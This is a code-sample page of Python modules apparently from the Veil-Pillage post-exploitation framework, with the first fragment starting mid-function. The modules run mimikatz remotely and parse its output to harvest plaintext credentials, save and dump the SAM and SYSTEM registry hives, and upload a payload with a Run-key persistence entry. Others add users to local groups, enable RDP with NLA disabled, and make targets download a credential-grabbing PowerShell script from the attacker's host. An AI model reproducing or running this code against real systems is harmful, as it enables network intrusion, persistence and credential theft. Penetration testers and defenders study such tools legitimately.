            print "\n [*] Executing mimikatz on " + target
            # first, detect the architecture
            archCommand = "echo %PROCESSOR_ARCHITECTURE%"
            archResult = command_methods.executeResult(target, username,
                                                       password, archCommand,
                                                       triggerMethod)

            # if there's a failure in this initial execution, go to the next target
            if "error" in archResult:
                self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n"
                continue

            arch = "x86"
            if "64" in archResult: arch = "x64"

            exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

            # now time for mimikatz!
            mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

            # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
            delivery_methods.hostTrigger(target,
                                         username,
                                         password,
                                         mimikatzPath,
                                         lhost,
                                         triggerMethod=triggerMethod,
                                         exeArgs=exeArgs)

            print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
            time.sleep(int(delay))

            # grab the output file and delete it
            out = smb.getFile(target,
                              username,
                              password,
                              out_file,
                              delete=True)

            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
                                              out)

            if out != "":
                self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

        # append the total mimikatz creds if we have any
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(
                allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(
                allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
Exemple #46
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        uploadName = self.required_options["upload_name"][0]
        key_name = self.required_options["key_name"][0]

        # if we're using Veil-Evasion for payload generation
        if self.required_options["exe_path"][0].lower() == "veil":

            # create a Veil-Evasion controller object for payload generation
            con = controller.Controller()

            # if we don't have payload specified, jump to the main controller menu
            if not self.args.p:
                payloadPath = con.MainMenu()
            # otherwise, set all the appropriate payload options
            else:
                # pull out any required options from the command line and
                # build the proper dictionary so we can set the payload manually
                options = {}
                if self.args.c:
                    options['required_options'] = {}
                    for option in self.args.c:
                        name, value = option.split("=")
                        options['required_options'][name] = [value, ""]

                # pull out any msfvenom shellcode specification and msfvenom options
                if self.args.msfpayload:
                    options['msfvenom'] = [
                        self.args.msfpayload, self.args.msfoptions
                    ]

                # manually set the payload in the controller object
                con.SetPayload(self.args.p, options)

                # generate the payload code
                code = con.GeneratePayload()

                # grab the generated payload .exe name
                payloadPath = con.OutputMenu(con.payload,
                                             code,
                                             showTitle=True,
                                             interactive=False)

            # nicely print the title and module name again (since Veil-Evasion trashes this)
            messages.title()
            print " [*] Executing module: " + helpers.color(self.name) + "..."

            # sanity check if the user exited Veil-Evasion execution
            if not payloadPath or payloadPath == "":
                print helpers.color(" [!] No output from Veil-Evasion",
                                    warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we have a custom-specified .exe, use that instead
        else:
            payloadPath = self.required_options["exe_path"][0]

            # if the .exe path doesn't exist, print and error and return
            if not os.path.exists(payloadPath):
                print helpers.color("\n\n [!] Invalid .exe path specified",
                                    warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # make sure the name ends with ".exe"
        if not uploadName.endswith(".exe"):
            uploadName += ".exe"

        # copy the resulting binary into the temporary directory with the appropriate name
        os.system("cp " + payloadPath + " /tmp/" + uploadName)

        for target in self.targets:

            baseName = payloadPath.split("/")[-1]

            # upload the payload to C:\Windows\System32\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\",
                           "/tmp/" + uploadName)
            self.output += "[*] Binary '" + baseName + "' uploaded to C:\\Windows\\" + uploadName + " using creds '" + username + ":" + password + "' on : " + target + "\n"

            # the registry command to set up the sethc stickkeys backdoor for the binary
            regCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /f /v " + key_name + " /t REG_SZ /d \"C:\\Windows\\" + uploadName + "\""

            # execute the sethc command and get the result
            sethcResult = command_methods.executeResult(
                target, username, password, regCommand, triggerMethod)

            if sethcResult == "":
                self.output += "[!] No result file, CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "The operation completed successfully" in sethcResult:
                self.output += "[*] CurrentVersion\\Run successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
                # build our cleanup -> deleting this registry run value
                cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v " + key_name + " /f"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            userToAdd = self.required_options["user"][0]
            groupToAdd = self.required_options["localgroup"][0]

            # command to add the user to the specified localgroup
            groupAddCommand = "net localgroup " + groupToAdd + " " + userToAdd + " /add"

            # execute the localgroup add command and get the result
            groupAddResult = command_methods.executeResult(target, username, password, groupAddCommand, triggerMethod)

            # check all of our results as appropriate
            if groupAddResult == "":
                self.output += (
                    "[!] No result file, localgroup add '"
                    + userToAdd
                    + " to "
                    + groupToAdd
                    + "' failed using creds '"
                    + username
                    + ":"
                    + password
                    + "' on : "
                    + target
                    + "\n"
                )

            elif "The command completed successfully" in groupAddResult:
                self.output += (
                    "[*] User '"
                    + userToAdd
                    + " added to "
                    + groupToAdd
                    + "' successfully using creds '"
                    + username
                    + ":"
                    + password
                    + "' on "
                    + target
                    + "\n"
                )

                # cleanup -> delete the user from the system
                cleanupCMD = "net localgroup " + groupToAdd + " " + userToAdd + " /delete"
                self.cleanup += (
                    "executeCommand|"
                    + target
                    + "|"
                    + username
                    + "|"
                    + password
                    + "|"
                    + cleanupCMD
                    + "|"
                    + triggerMethod
                    + "\n"
                )

            else:
                self.output += (
                    "[!] Localgroup add '"
                    + userToAdd
                    + " to "
                    + groupToAdd
                    + "' failed using creds '"
                    + username
                    + ":"
                    + password
                    + "' on : "
                    + target
                    + "\n"
                )
Exemple #48
0
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        lhost = self.required_options["lhost"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]
        
        # the temporary output file gpp-password will write to
        if "\\" not in out_file:
            # otherwise assume it's an absolute path
            out_file = "C:\\Windows\\Temp\\" + out_file         

        # let's keep track of ALL plaintext credentials found
        allmsv, allkerberos, allwdigest, alltspkg  = [], [], [], []

        for target in self.targets:

            print "\n [*] Executing mimikatz on "+target
            # first, detect the architecture
            archCommand = "echo %PROCESSOR_ARCHITECTURE%"
            archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod)

            # if there's a failure in this initial execution, go to the next target
            if "error" in archResult:
                self.output += "[!] Mimikatz failed for "+target+" : "+archResult+"\n"
                continue

            arch = "x86"
            if "64" in archResult: arch = "x64"

            exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

            # now time for mimikatz!
            mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz"+arch+".exe"

            # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
            delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs)

            print "\n [*] Waiting "+delay+"s for Mimikatz to run..."
            time.sleep(int(delay))

            # grab the output file and delete it
            out = smb.getFile(target, username, password, out_file, delete=True)

            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

            if out != "":
                self.output += "[*] Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
            else:
                self.output += "[!] Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"

        # append the total mimikatz creds if we have any
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
Exemple #49
0
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        lhost = self.required_options["lhost"][0]
        use_ssl = self.required_options["use_ssl"][0]
        force_method = self.required_options["force_method"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # let's keep track of all credentials found
        allhashes, allmsv, allkerberos, allwdigest, alltspkg  = [], [], [], [], []

        for target in self.targets:

            powershellInstalled = False

            # check if we're forcing a particular grab method
            if force_method.lower() == "binary":
                powershellInstalled = False
            elif force_method.lower() == "powershell":
                powershellInstalled = True
            else:
                # check if we have a functional Powershell installation
                powershellCommand = "powershell.exe -c \"$a=42;$a\""
                powershellResult = command_methods.executeResult(
                    target, username, password, powershellCommand, "wmis")
                if powershellResult.strip() == "42": powershellInstalled = True

            if powershellInstalled:

                # do powersploit combined file of invoke-mimikatz and powerdump
                print helpers.color("\n [*] Powershell installed on " + target)
                self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                # path to the combined Invoke-Mimikatz/powerdump powershell script
                secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

                # trigger the powershell download on just this target
                delivery_methods.powershellHostTrigger(target,
                                                       username,
                                                       password,
                                                       secondStagePath,
                                                       lhost,
                                                       "",
                                                       triggerMethod="winexe",
                                                       outFile=out_file,
                                                       ssl=use_ssl,
                                                       noArch=True)

                print "\n [*] Waiting " + delay + "s for Autograb to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target,
                                  username,
                                  password,
                                  out_file,
                                  delete=True)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "autograb.txt",
                                                  out)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # parse the powerdump component
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                if out != "":
                    self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
                else:
                    self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

            else:
                # do reg.exe for hashdump and host/execute for mimikatz
                print helpers.color("\n [!] Powershell not installed on " +
                                    target,
                                    warning=True)
                print helpers.color(
                    "\n [*] Using reg.exe save method for hash dumping on " +
                    target)
                self.output += "[!] Powershell not installed on " + target + "\n"

                # reg.exe command to save off the hives
                regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

                # execute the registry save command
                command_methods.executeCommand(target, username, password,
                                               regSaveCommand, "wmis")

                print helpers.color("\n [*] Dumping hashes on " + target)

                # sleep for 5 seconds to let everything backup
                time.sleep(5)

                # grab all of the backed up files
                systemFile = smb.getFile(target,
                                         username,
                                         password,
                                         "C:\\Windows\\Temp\\system",
                                         delete=False)
                securityFile = smb.getFile(target,
                                           username,
                                           password,
                                           "C:\\Windows\\Temp\\security",
                                           delete=False)
                samFile = smb.getFile(target,
                                      username,
                                      password,
                                      "C:\\Windows\\Temp\\sam",
                                      delete=False)

                # more error-checking here?
                if systemFile == "":
                    self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open('/tmp/system', 'w')
                    f.write(systemFile)
                    f.close()

                if securityFile == "":
                    self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open('/tmp/security', 'w')
                    f.write(securityFile)
                    f.close()

                if samFile == "":
                    self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open('/tmp/sam', 'w')
                    f.write(samFile)
                    f.close()

                # get all the hashes from these hives
                out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

                # save the output file off
                saveLocation = helpers.saveModuleFile(self, target,
                                                      "creddump.txt", out)
                self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"

                # save these off to the universal list
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                # now, detect the architecture
                archCommand = "echo %PROCESSOR_ARCHITECTURE%"
                archResult = command_methods.executeResult(
                    target, username, password, archCommand, "wmis")
                arch = "x86"
                if "64" in archResult: arch = "x64"

                # now time for ze mimikatz!
                mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

                # host mimikatz.exe and trigger it ONLY on this particular machine
                # so we can get the architecture correct
                delivery_methods.hostTrigger(target,
                                             username,
                                             password,
                                             mimikatzPath,
                                             lhost,
                                             triggerMethod="wmis",
                                             exeArgs=exeArgs)

                print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target,
                                  username,
                                  password,
                                  out_file,
                                  delete=True)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
                                                  out)

                if out != "":
                    self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
                else:
                    self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

        if len(allhashes) > 0:
            allhashes = sorted(set(allhashes))
            self.output += "[*] All unique hashes:\n\t" + "\n\t".join(
                allhashes) + "\n"
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(
                allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(
                allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
Exemple #50
0
    def run(self):

        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # enable RDP command
        rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

        # cleanup RDP command
        rdpCleanupCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"

        # Disable NLA command
        nlaCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f"

        # Firewall exception command
        firewallCMD = "netsh firewall set service type = remotedesktop mod = enable"

        for target in self.targets:

            # execute the RDP enable command and get the result
            rdpResult = command_methods.executeResult(target, username,
                                                      password, rdpCMD,
                                                      triggerMethod)

            if rdpResult == "":
                self.output += "[!] No result file, RDP enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "The operation completed successfully" in rdpResult:

                self.output += "[*] RDP successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
                # our cleanup is to execute the RDP disable command
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + rdpCleanupCMD + "|" + triggerMethod + "\n"

                # if we succeed here, keep going...

                # execute the disable NLA command
                nlaResult = command_methods.executeResult(
                    target, username, password, nlaCMD, triggerMethod)
                if nlaResult == "":
                    self.output += "[!] No result file, NLA disable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
                elif "The operation completed successfully" in nlaResult:
                    self.output += "[*] NLA successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"

                    # more success, keep going again...

                    # execute the firewall exception command
                    firewallResult = command_methods.executeResult(
                        target, username, password, firewallCMD, triggerMethod)

                    if firewallResult == "":
                        self.output += "[!] No result file, firewall exeception failed using creds '" + username + ":" + password + "' on : " + target + "\n"
                    elif "executed successfully" in firewallResult:
                        self.output += "[*] Firewall exception successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
                    else:
                        self.output += "[!] Error in enabling firewall exception using creds '" + username + ":" + password + "' on : " + target + "\n"

                else:
                    self.output += "[!] Error in disabling NLA using creds '" + username + ":" + password + "' on : " + target + "\n"

            else:
                self.output += "[!] Error in enabling RDP using creds '" + username + ":" + password + "' on : " + target + "\n"